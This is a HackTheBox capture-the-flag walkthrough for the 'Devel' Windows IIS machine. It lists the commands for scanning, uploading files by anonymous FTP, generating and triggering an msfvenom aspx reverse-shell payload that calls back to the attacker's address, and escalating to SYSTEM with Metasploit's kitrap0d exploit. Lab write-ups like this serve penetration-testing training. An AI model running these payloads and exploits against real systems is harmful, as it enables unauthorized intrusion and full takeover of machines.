Devel

HTB - 4. Devel

1. nmap -T4 -p- -A 10.10.10.5 shows 22 (FTP) with anonymous login (to webroot directory?), 80 (HTTP) with Microsoft IIS httpd 7.5

2. Go to 10.10.10.5 which is a default web page

3. dirbuster (dirb and gobuster popular as well) with http://10.10.10.5:80, wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt, and change file-extension to asm, asmx, asp, aspx, txt because server is IIS

4. FTP: upload file to server

   Copy

   ftp 10.10.10.5
   anonymous
   anonymous
   ls
   pwd
   put dog.jpg
   ls

   Go to 10.10.10.5/dog.jpg and it executes.

5. msfvenom

   Create reverse_tcp payload:

   Copy

   msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.24 LPORT=4444 -f aspx > ex.aspx

   Open up port to listen on:

   Copy

   sudo msfconsole
   use exploit/multi/handler
   options
   set payload windows/meterpreter/reverse_tcp
   options
   set LHOST 10.10.14.24
   run

6. Back to FTP

   Copy

   binary <-- swith to binary instead of ascii
   put ex.aspx

   Go to 10.10.10.5/ex.aspx and shell popped

7. Hacked

   Copy

   sysinfo
   getuid

   Result: We are IIS APPPOOL\Web not authority system. getsystem failed.

   Check to see which privilege escalation exploits might work:

   Copy

   background
   search suggester
   use post/multi/recon/local_exploit_suggester
   options
   set SESSION 1
   run

   Run privilege escalation

   Copy

   use exploit/windows/local/ms10_015_kitrap0d
   options
   set SESSION 1
   options
   run
   options
   set lhost 10.10.14.24 <-- make sure using the right interface
   set lport 4445 <-- Need to use different port since 4445 already in use
   options
   run

   Result: Shell popped with authority system